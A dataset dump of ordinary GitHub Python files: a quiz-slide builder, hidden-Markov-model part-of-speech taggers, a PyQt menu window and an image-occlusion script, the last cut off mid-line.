wx.ID_OK:\n path = dialog.GetPath() #Get path from chosen file\n else:\n path = None\n dialog.Destroy()\n\n newDest = os.path.join('web/images/', os.path.basename(path)) #Create new path to image folder in web/\n shutil.copy(path, newDest) #Copy chosen image over\n\n return newDest\n\n@eel.expose\ndef getQuestionHTML(fileName):\n \"\"\"\n Very basic - opens a given HTML file and reads its contents to one string, encoded to utf-8, input\n \n - fileName (str): file path to open\n\n Returns read file as string. Obviously will not work if file is unreadable or cannot be extracted using Python func .read()\n \"\"\"\n with open(fileName, 'r', encoding='utf-8') as f:\n asString = f.read()\n\n return asString\n\n@eel.expose\ndef getTemplateHTML(questionNumber):\n \"\"\"\n Opens the correct HTML snippet for the given question and replaces the contents with the quiz data, input\n\n - questionNumber (str): Question to unpack (REMEMBER THIS STARTS AT '1'), also used as key in quizMap object\n\n Returns the HTML slide for the given question (this is the slide preview) as one string\n \"\"\"\n\n try: #quizMap exists, no question data\n if len(list(quizMap[questionNumber]['details'].keys())) < 1: #Loading in a blank template/unsaved question, nothing to return, avoids errors thrown\n return 'Build and save a question to see the slide!'\n except (NameError, KeyError) as e: #First/second stage error, no quizMap object yet or no question key yet\n return 'Build and save a question to see the slide!'\n\n\n with open('web/snippets/template.html', 'r', encoding='utf-8') as f: #Read in slide template\n asString = f.read()\n\n try:\n asString = asString.replace('[IMAGE]', quizMap[questionNumber]['imagePath']) #Add image path to template\n except KeyError:\n asString = asString.replace('', '') #No image selected, thus no 'imagePath' key, remove placeholder\n\n #Replace question placeholder and get question type (MCQ/TF/Input)\n asString = asString.replace('[QUESTION]',quizMap[questionNumber]['details']['question'])\n qType = quizMap[questionNumber]['questionType']\n\n #Basically a switch case to replace necessary elements for each one\n if qType == 'TrueFalse':\n with open('web/snippets/widgets/tf.html', 'r', encoding='utf-8') as f: #Read in true false html\n widget = f.read()\n\n asString = asString.replace('[INSERTS]', widget)\n elif qType == 'Input':\n with open('web/snippets/widgets/input.html', 'r', encoding='utf-8') as f: #Read in input html\n widget = f.read()\n\n asString = asString.replace('[INSERTS]', widget)\n asString = asString.replace('[SUFFIX]', quizMap[questionNumber]['details']['answerSuffix'])\n asString = asString.replace('[ANSWERTYPE]', quizMap[questionNumber]['details']['answerType'])\n elif qType == 'MCQ':\n with open('web/snippets/widgets/mcq.html', 'r', encoding='utf-8') as f: #Read in mcq html\n widget = f.read()\n\n questions = [quizMap[questionNumber]['details']['correctAnswer'],\n quizMap[questionNumber]['details']['option2'],\n quizMap[questionNumber]['details']['option3']] #Build array of MCQ answers and shuffle them\n random.shuffle(questions)\n\n for i in range(3):\n widget = widget.replace(f'[OPTION{i+1}]', questions[i]) #Put the questions in the slide HTML\n\n asString = asString.replace('[INSERTS]', widget)\n\n return asString\n\n@eel.expose\ndef getSlideCSS():\n \"\"\"\n Unpacks the editable slide css and puts it in the Kiwi editor ready for users to directly edit slide appearance.\n Returns the portion of the example template stylesheet for slide CSS, starting on the line '.slide, .endSlide {'\n \"\"\"\n\n with open('example/style.css', 'r') as f:\n styles = f.read()\n\n startLocation = styles.find('.slide, .endSlide') #Skip to just slide CSS\n\n return styles[startLocation:]\n\n@eel.expose\ndef saveNewStylesheet(newStyles):\n \"\"\"\n Takes user's input css styles for the slides and generates a new stylesheet for the output; input\n\n - newStyles (str): Style rules for the slides taken from the front end\n\n The stylesheet is NOT packaged into the output here; that is in packageQuiz()\n \"\"\"\n\n with open('example/style.css', 'r') as f:\n styles = f.read()\n\n endLocation = styles.find('.slide, .endSlide') #Skip to just slide CSS\n newSheet = styles[:endLocation] + newStyles\n\n #Save new stylesheet\n with open('style.css', 'w') as f:\n f.write(newSheet)\n\n@eel.expose\ndef generateMap(number):\n \"\"\"\n Either updates the quizMap object to add new questions, or initialises a blank one.\n A new one is initialised if 'quizMap' cannot be found in the global variables; input\n\n - number (str): Number of questions to initialise in the quizMap. If there are already questions in the quiz map,\n these should not be affected; it will remove down to the number or add blank questions beyond the ones that already exist\n\n No return, but prints quizMap to console (mainly for debugging)\n \"\"\"\n global quizMap\n\n if 'quizMap' in list(globals()):\n mapKeys = list(quizMap.keys()) #Questions already in quizMap\n totalKeys = len([i for i in mapKeys if i not in ['quizName', 'passMark', 'questionTotal']]) #Ignore these keys, tally total\n\n if int(number) > totalKeys:\n for i in range(totalKeys+1, int(number)+1):\n quizMap[f'{i}'] = {'questionType': '', 'details': {}} #Add new blank questions if more than already existing\n\n elif int(number) < totalKeys:\n for i in range(int(number)+1, totalKeys+1): #Trim down to number of questions if some removed, use del operator\n del quizMap[f'{i}']\n\n #quizMap object doesn't exist yet, make new blank with given number of questions\n else:\n quizMap = {}\n for i in range(1, int(number)+1):\n quizMap[f'{i}'] = {'questionType': '', 'details': {}}\n\n print(quizMap) #Print for debug\n\n@eel.expose\ndef packageQuiz():\n \"\"\"\n Uses the example/ folder to actually build the quiz from the content sent through the frontend, packaging it into a folder\n in the KiwiOutput folder generated on the user's desktop. quizMap object gets saved to external JSON while writing the quiz,\n this is unpacked and added to the JS script in output. No inputs.\n \"\"\"\n #Check for output path on Desktop\n deskPath = f'{DESKTOP_PATH}/KiwiOutput'\n if (os.path.exists(deskPath) == False):\n os.mkdir(deskPath)\n\n #Dir for quiz file\n outPath = f'{deskPath}/{quizMap[\"quizName\"]}'\n if os.path.exists(outPath):\n os.rmdir(outPath)\n \n os.mkdir(outPath) #We're overwriting! Be aware\n\n #Copy images dir\n os.mkdir(f'{outPath}/images')\n for i in os.listdir('web/images'):\n shutil.copy2(os.path.join('web/images',i), f'{outPath}/images')\n\n #Rewrite script to add quizContext in example\n with open('example/script.js', 'r') as fjs:\n lineList = fjs.readlines()\n with open('QM.json', 'r') as fjson:\n toAdd = json.load(fjson)\n\n for ind, l in enumerate(lineList):\n if 'const quizContext' in l:\n lineList[ind] = f\"const quizContext = {toAdd};\\n\" #Actually replace the context\n\n #Turn to one string and minify, then write\n minifyAPI = 'https://www.toptal.com/developers/javascript-minifier/raw' #API handling it\n minified = requests.post(minifyAPI, data=dict(input=''.join(lineList))).text\n with open('script.js', 'w') as f:\n f.write(minified)\n\n copytree('./example', outPath)\n shutil.copy2('./script.js', outPath) #Replace with new script\n os.remove('./script.js')\n\n #If user edited stylesheet, copy that over and delete\n if os.path.exists('./style.css'):\n shutil.copy2('./style.css', outPath)\n os.remove('./style.css')\n\n#Simple getters/setters for accessing questions in the QuizMap object and communicating with the JS\n@eel.expose\ndef setGeneralDetails(key, value):\n quizMap[key] = value\n\n with open('QM.json', 'w') as f:\n json.dump(quizMap, f, indent=2) #Write quizMap object to external file QM.json simultaneously (avoid dataloss/used later to package quiz)\n\n@eel.expose\ndef setQuestion(number, key, value):\n if key == 'imagePath':\n quizMap[number][key] = os.path.relpath(value, 'web') #Need relative path here not given value\n else:\n quizMap[number][key] = value\n\n@eel.expose\ndef setQuestionDetails(number, key, value):\n quizMap[number]['details'][key] = value\n\n with open('QM.json', 'w') as f:\n json.dump(quizMap, f, indent=2) #Write quizMap object to external file QM.json simultaneously (avoid dataloss/used later to package quiz)\n \n@eel.expose\ndef getQuestion(number):\n return quizMap[number]\n\nif __name__ == '__main__':\n eel.start(\"index.html\", size=(1300, 850), port=8080) #Other programs such as MAGI default to 8000, this allows synchronous running", "repo_name": "ewanmiles/Kiwi", "sub_path": "workspace/Kiwi.py", "file_name": "Kiwi.py", "file_ext": "py", "file_size_in_byte": 10936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}, {"api_name": "os.system", "line_number": 10, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 14, "usage_type": "call"}, {"api_name": "eel.init", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 25, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "shutil.copytree", "line_number": 42, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 44, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 53, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.FD_FILE_MUST_EXIST", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 55, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 63, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 46, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 67, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 130, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 81, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 139, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 153, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "os.rmdir", "line_number": 221, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 223, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 226, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 227, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 234, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 242, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 247, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 251, "usage_type": "call"}, {"api_name": "os.path", "line_number": 251, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 252, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 253, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 206, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 261, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 256, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 263, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 275, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 270, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 277, "usage_type": "attribute"}, {"api_name": "eel.start", "line_number": 282, "usage_type": "call"}]} +{"seq_id": "36341769569", "text": "from abc import abstractmethod\nfrom collections import defaultdict\nfrom math import log, exp\nfrom sys import float_info\nfrom typing import AnyStr, List, Dict, Union, Type\n\nfrom dataset import START_TAG, END_TAG\nfrom probability import ProbabilityDistributionTable\n\n# This effectively acts as probability 0 in the form of log probability.\nmin_log_prob = -float_info.max\n\n\nclass POSTagger:\n def __init__(self, emission_matrix: ProbabilityDistributionTable, transition_matrix: ProbabilityDistributionTable):\n \"\"\"\n Constructor fo POS tagger class.\n :param emission_matrix: emission probability table\n :param transition_matrix: transition probability table\n \"\"\"\n self._emission_matrix = emission_matrix\n self._transition_matrix = transition_matrix\n\n @abstractmethod\n def get_tags(self, list_of_tokens: List[AnyStr], as_mapping: bool = False) -> Union[List[AnyStr], Dict[AnyStr,\n AnyStr]]:\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n raise NotImplemented()\n\n @classmethod\n def name(cls):\n \"\"\"\n Gets class name\n :return:\n \"\"\"\n return cls.__name__\n\n @staticmethod\n def as_mapping(list_of_tokens, list_of_tags):\n \"\"\"\n Returns list of tokens and list of tags as a list of paired tokens to tags\n :param list_of_tokens: list of tokens\n :param list_of_tags: list of pos tags\n :return:\n \"\"\"\n return dict((k, v) for k, v in zip(list_of_tokens, list_of_tags))\n\n def get_tagset(self):\n tagset = self._transition_matrix.get_unique_prior_tokens()\n # remove start and end tag from tagset\n if START_TAG in tagset:\n tagset.remove(START_TAG)\n if END_TAG in tagset:\n tagset.remove(END_TAG)\n return tagset\n\n\nclass EagerTagger(POSTagger):\n def _infer_tag(self, previous_tag, current_token) -> str:\n \"\"\"\n Infers the current tag (t_i) using the previous tag (t_i-1) and current token (w_i).\n :param previous_tag: previous tag\n :param current_token: current token\n :return: proposed tag\n \"\"\"\n # get all instances of t_i\n tagset_probabilities = []\n for tag in self.get_tagset():\n transition_prob = self._transition_matrix.infer(prior=previous_tag, target=tag)\n emission_prob = self._emission_matrix.infer(prior=tag, target=current_token)\n tagset_probabilities.append((tag, transition_prob * emission_prob))\n max_tag_prob_pair = max(tagset_probabilities, key=lambda v: v[1])\n return max_tag_prob_pair[0]\n\n def get_tags(self, list_of_tokens: List[AnyStr], as_mapping: bool = False) -> Union[List[AnyStr], Dict[AnyStr,\n AnyStr]]:\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n # gets tag from a sentence\n t_i = START_TAG\n predicted_tags = []\n for token in list_of_tokens:\n t_i = self._infer_tag(t_i, token)\n predicted_tags.append(t_i)\n if as_mapping:\n return self.as_mapping(list_of_tokens, predicted_tags)\n return predicted_tags\n\n\nclass ViterbiPOSTagger(POSTagger):\n def get_tags(self, list_of_tokens, as_mapping=False):\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n predicted_tags = list()\n # perform forward pass\n tagset = self.get_tagset()\n _, b_table = self._forward_track(tagset, list_of_tokens)\n # backtrack the b table to find your optimal set\n # find the tag for the highest end tag probability\n tracker = END_TAG\n for idx, v in reversed(b_table.items()):\n if len(v) == 1:\n key = list(v.keys())[0]\n predicted_tags.append(key)\n tracker = v[key]\n else:\n predicted_tags.append(tracker)\n tracker = v[tracker]\n if as_mapping:\n return self.as_mapping(list_of_tokens, predicted_tags[::-1][1:-1])\n return predicted_tags[::-1][1:-1]\n\n def _forward_track(self, tag_set, list_of_tokens, ):\n v_table = defaultdict(dict)\n b_table = defaultdict(dict)\n v_table[0] = {START_TAG: 1}\n b_table[0] = {START_TAG: START_TAG}\n for token_idx, token in enumerate(list_of_tokens):\n for tag in tag_set:\n if token_idx == 0:\n emission_prob = self._emission_matrix.infer(prior=tag, target=list_of_tokens[token_idx])\n transition_prob = self._transition_matrix.infer(prior=START_TAG, target=tag)\n max_v_tag_prob_pair = (tag, log(transition_prob) + log(emission_prob))\n\n else:\n trellis = []\n emission_prob = self._emission_matrix.infer(prior=tag, target=list_of_tokens[token_idx])\n for previous_tag in tag_set:\n transition_prob = self._transition_matrix.infer(prior=previous_tag, target=tag)\n previous_v = v_table[token_idx][previous_tag] # already in log\n trellis.append((previous_tag, log(transition_prob) + log(emission_prob) + previous_v))\n max_v_tag_prob_pair = max(trellis, key=lambda i: i[1])\n\n v_table[token_idx + 1][tag] = max_v_tag_prob_pair[1]\n b_table[token_idx + 1][tag] = (max_v_tag_prob_pair[0])\n # for the closing tag\n closing_trellis = [(t, log(self._transition_matrix.infer(prior=t, target=END_TAG))\n + v_table[len(list_of_tokens)][t]) for t in tag_set]\n max_v_tag_prob_pair = sorted(closing_trellis, key=lambda i: i[1])[-1]\n v_table[len(list_of_tokens) + 1] = {END_TAG: max_v_tag_prob_pair[1]}\n b_table[len(list_of_tokens) + 1] = {END_TAG: max_v_tag_prob_pair[0]}\n return v_table, b_table\n\n\nclass MostProbablePOSTagger(POSTagger):\n def get_tags(self, list_of_tokens, as_mapping=False):\n \"\"\"\n Get tags for a list of tokens\n :param list_of_tokens: list of tokens\n :param as_mapping: result should be returned as a list of pos tags or a mapping of tokens to pos tags\n \"\"\"\n predicted_tags = list()\n # perform forward pass\n tagset = self.get_tagset()\n alpha_table = self._forward_track(tagset, list_of_tokens)\n beta_table = self._backward_track(tagset, list_of_tokens)\n # alpha and beta table are the same size and confirmed that alpha[q_f] == beta[q_0]\n gamma_table = self._combine_table(alpha_table, beta_table)\n # get tags for the sentence\n for i in range(1, len(list_of_tokens) + 1):\n max_tag_prob_pair = sorted(gamma_table[i].items(), key=lambda v: v[1])[-1]\n predicted_tags.append(max_tag_prob_pair[0])\n if as_mapping:\n return self.as_mapping(list_of_tokens, predicted_tags)\n return predicted_tags\n\n def _forward_track(self, tag_set, list_of_tokens):\n \"\"\"\n Forward probability algorithm for generating alpha table\n :param tag_set: list of tags\n :param list_of_tokens: list of tokens\n :return: alpha table\n \"\"\"\n alpha_table = defaultdict(dict)\n alpha_table[0] = {START_TAG: 1}\n for token_idx, token in enumerate(list_of_tokens):\n for current_tag in tag_set:\n if token_idx == 0:\n emission_prob = self._emission_matrix.infer(prior=current_tag, target=token)\n transition_prob = self._transition_matrix.infer(prior=START_TAG, target=current_tag)\n log_alpha = log(emission_prob) + log(transition_prob)\n else:\n temp_alphas = []\n emission_prob = self._emission_matrix.infer(prior=current_tag, target=token)\n for previous_tag in tag_set:\n transition_prob = self._transition_matrix.infer(prior=previous_tag, target=current_tag)\n temp_alphas.append(\n log(emission_prob) + log(transition_prob) + alpha_table[token_idx][previous_tag])\n log_alpha = self.logsumexp(temp_alphas)\n alpha_table[token_idx + 1][current_tag] = log_alpha\n # do for closing tag\n alpha_table[len(list_of_tokens) + 1] = {\n END_TAG: self.logsumexp([log(self._transition_matrix.infer(prior=t, target=END_TAG))\n + alpha_table[len(list_of_tokens)][t] for t in tag_set])\n }\n\n return alpha_table\n\n def _backward_track(self, tag_set, list_of_tokens):\n \"\"\"\n Backward probability algorithm for generating beta table\n :param tag_set: list of tags\n :param list_of_tokens: list of tokens\n :return: beta table\n \"\"\"\n beta_table = defaultdict(dict)\n beta_table[len(list_of_tokens) + 1] = {END_TAG: 1}\n for token_idx, token in reversed(list(enumerate(list_of_tokens))):\n for current_tag in tag_set:\n if token_idx + 1 == len(list_of_tokens):\n log_beta = log(self._transition_matrix.infer(prior=current_tag, target=END_TAG))\n else:\n temp_betas = []\n for previous_tag in tag_set:\n emission_prob = self._emission_matrix.infer(prior=previous_tag,\n target=list_of_tokens[\n token_idx + 1]) # [token_idx + 1])\n transition_prob = self._transition_matrix.infer(prior=current_tag, target=previous_tag)\n temp_betas.append(\n log(emission_prob) + log(transition_prob) + beta_table[token_idx + 2][\n previous_tag]) # [token_idx + 1][previous_tag])\n log_beta = self.logsumexp(temp_betas)\n beta_table[token_idx + 1][current_tag] = log_beta\n # do for opening tag\n beta_table[0] = {\n START_TAG: self.logsumexp([log(self._transition_matrix.infer(prior=START_TAG, target=t))\n + log(self._emission_matrix.infer(t, list_of_tokens[0]))\n + beta_table[1][t] for t in tag_set])\n }\n return beta_table\n\n def _combine_table(self, alpha_table, beta_table):\n \"\"\"\n Joins alpha and beta table\n :param alpha_table: alpha table from forward probability algorithm\n :param beta_table: beta table from backward probability algorithm\n :return: gamma table where gamma[i][j] = alpha[i][j] * beta[i][j]\n \"\"\"\n gamma_table = dict()\n for step_key, alpha_step_dict in alpha_table.items():\n # multiply alpha and beta table elementwise\n gamma_step_dict = {}\n beta_step_dict = beta_table[step_key]\n for tag_key in alpha_step_dict.keys():\n # since both alpha and beta tables are in ln form. we just add them and take the exponent\n gamma_step_dict[tag_key] = exp(alpha_step_dict[tag_key] + beta_step_dict[tag_key])\n gamma_table[step_key] = gamma_step_dict\n return gamma_table\n\n @staticmethod\n def logsumexp(vals):\n \"\"\"\n Adding a list of probabilities represented as log probabilities.\n :param vals: log values\n :return: sum of log values\n \"\"\"\n\n if len(vals) == 0:\n return min_log_prob\n m = max(vals)\n if m == min_log_prob:\n return min_log_prob\n else:\n return m + log(sum([exp(val - m) for val in vals]))\n\n\ndef resolve_taggers(tagger_type) -> List[Type[POSTagger]]:\n taggers = []\n if tagger_type == \"eager\":\n taggers.append(EagerTagger)\n elif tagger_type == \"viterbi\":\n taggers.append(ViterbiPOSTagger)\n elif tagger_type == \"local_decoding\":\n taggers.append(MostProbablePOSTagger)\n elif tagger_type == \"all\":\n taggers.extend([EagerTagger, ViterbiPOSTagger, MostProbablePOSTagger]) # [EagerTagger, MostProbablePOSTagger]\n else:\n raise Exception(f\"Cannot resolve the tagger type [{tagger_type}]\")\n return taggers\n", "repo_name": "collinsikechukwu10/POSTagging-Algorithms", "sub_path": "tagger.py", "file_name": "tagger.py", "file_ext": "py", "file_size_in_byte": 13014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.float_info.max", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.float_info", "line_number": 11, "usage_type": "name"}, {"api_name": "probability.ProbabilityDistributionTable", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 25, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 26, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 55, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 56, "usage_type": "argument"}, {"api_name": "dataset.END_TAG", "line_number": 57, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 58, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 79, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.AnyStr", "line_number": 80, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 110, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 124, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 125, "usage_type": "call"}, {"api_name": "dataset.START_TAG", "line_number": 126, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 127, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 132, "usage_type": "name"}, {"api_name": "math.log", "line_number": 133, "usage_type": "call"}, {"api_name": "math.log", "line_number": 141, "usage_type": "call"}, {"api_name": "math.log", "line_number": 147, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 147, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 150, "usage_type": "name"}, {"api_name": "dataset.END_TAG", "line_number": 151, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 184, "usage_type": "call"}, {"api_name": "dataset.START_TAG", "line_number": 185, "usage_type": "name"}, {"api_name": "dataset.START_TAG", "line_number": 190, "usage_type": "name"}, {"api_name": "math.log", "line_number": 191, "usage_type": "call"}, {"api_name": "math.log", "line_number": 198, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 203, "usage_type": "name"}, {"api_name": "math.log", "line_number": 203, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 216, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 217, "usage_type": "name"}, {"api_name": "math.log", "line_number": 221, "usage_type": "call"}, {"api_name": "dataset.END_TAG", "line_number": 221, "usage_type": "name"}, {"api_name": "math.log", "line_number": 230, "usage_type": "call"}, {"api_name": "dataset.START_TAG", "line_number": 236, "usage_type": "name"}, {"api_name": "math.log", "line_number": 236, "usage_type": "call"}, {"api_name": "math.log", "line_number": 237, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 256, "usage_type": "call"}, {"api_name": "math.log", "line_number": 274, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 274, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 277, "usage_type": "name"}]} +{"seq_id": "31293833840", "text": "from PyQt5.QtWidgets import (\n QAction,\n QMainWindow,\n)\n\n\nclass MainWindow(QMainWindow):\n def setup(self, on_menu_item_tap):\n menuBar = self.menuBar()\n\n editMenu = menuBar.addMenu(\"&View\")\n\n self.request_view_action = QAction(\"Toggle request editor visibility\")\n self.request_view_action.triggered.connect(\n lambda: on_menu_item_tap(\"request_view\")\n )\n editMenu.addAction(self.request_view_action)\n\n self.templates_view_action = QAction(\"Toggle output view visibility\")\n self.templates_view_action.triggered.connect(\n lambda: on_menu_item_tap(\"output_view\")\n )\n self.setWindowTitle(\"curl2swift\")\n editMenu.addAction(self.templates_view_action)\n", "repo_name": "tomnvt/curl2swift", "sub_path": "curl2swift/layers/presentation/main_window.py", "file_name": "main_window.py", "file_ext": "py", "file_size_in_byte": 752, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 13, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "30058483706", "text": "import os,sys\nfrom PIL import Image, ImageDraw\nimport numpy as np\n\nimages_path = \"/datasets_nas/mapa3789/Pixel2Mesh/HandToolsRendered/ShapeNetHandTools_V13/\"\n\nsave_path = \"/datasets_nas/mapa3789/Pixel2Mesh/HandToolsRendered/ShapeNetHandTools_Occultation_Small\"\n\noccultation_factor = 5\n\n\ndef listFiles(dir, ext, ignoreExt=None):\n \"\"\"\n Return array of all files in dir ending in ext but not ignoreExt.\n \"\"\"\n matches = []\n for root, dirs, files in os.walk(dir):\n for f in files:\n if f.endswith(ext):\n if not ignoreExt or (ignoreExt and not f.endswith(ignoreExt)):\n matches.append(os.path.join(root, f))\n return matches\n\n\ndef draw_ellipse_on_img(im, radius, x_start, y_start):\n draw = ImageDraw.Draw(im)\n half_rad = radius / 2\n draw.ellipse((x - half_rad, y - half_rad, x + half_rad, y + half_rad), fill=0)\n\n\ndef calculate_bounding_box(im):\n im.getbbox()\n\ndef calculate_mask_dimensions(bounding_box):\n pass\n\n\ndef get_pixels(im):\n pixels = list(im.getdata())\n width, height = im.size\n return [pixels[i * width:(i + 1) * width] for i in range(height)]\n\ndef get_image_object_pixels(pixel_list):\n image_pixels = np.asarray(pixel_list)\n image_pixels = np.sum(image_pixels, axis=2) # sum color + alpha together\n obj_pixels = image_pixels[image_pixels[:,:]!=0]\n return image_pixels, obj_pixels\n\ndef get_percentage_obj_img(image_pixels, object_pixels):\n return float(obj_pixels.size) / float(image_pixels.size)\n\ndef calc_percentage_occultation(before_ratio, after_ratio):\n return 1 - (1 / (before_ratio + 1.e-8)) * after_ratio\n\ndef get_random_point_on_object(image_pixels):\n single_vector = np.reshape(image_pixels, (1,-1))[0]\n idx_nonzero, = np.nonzero(single_vector)\n random_pixel = np.random.choice(idx_nonzero)\n\n y = int(np.floor(random_pixel / image_pixels.shape[0]))\n x = random_pixel % image_pixels.shape[0]\n\n return x,y\n\ndef export_proportions(proportions):\n export = np.asarray(proportions)\n\n #add mean as column\n mean_percentage_cutout = export[1:,3].astype(np.float).mean()\n export = np.insert(export, 4, mean_percentage_cutout, axis=1)\n export[0][4] = 'mean percentage cutout'\n\n np.savetxt(os.path.join(save_path, \"proportions.csv\"), export, delimiter=\",\", fmt=\"%s\")\n np.savetxt(\"tmp/proportions.csv\", export, delimiter=\",\", fmt=\"%s\")\n print(\"FINISHED: mean percentage cutout: {}\".format(mean_percentage_cutout))\n print(\"RUN AGAIN WITH DIFFERENT RADIUS RATIO IF NOT SATISFIED\")\n\nproportions = [['Image file', 'object to image proportion (oip)', 'oip after masking', 'percentage cutout']]\nimages = listFiles(images_path, \".png\")\n\n\nimage_length = len(images)\nfor index, image in enumerate(images):\n\n print(\"{}/{}\".format(index+1, image_length))\n\n im = Image.open(image).convert(\"RGBA\")\n # bounding_box = im.getbbox()\n\n # replace this arbitrary number 5 with the amount you want to cut --> magic number\n # improvement: might have to adjust script, so it will always crop ~30% of the image\n # no time currently\n radius = max(im.size[0], im.size[1]) / 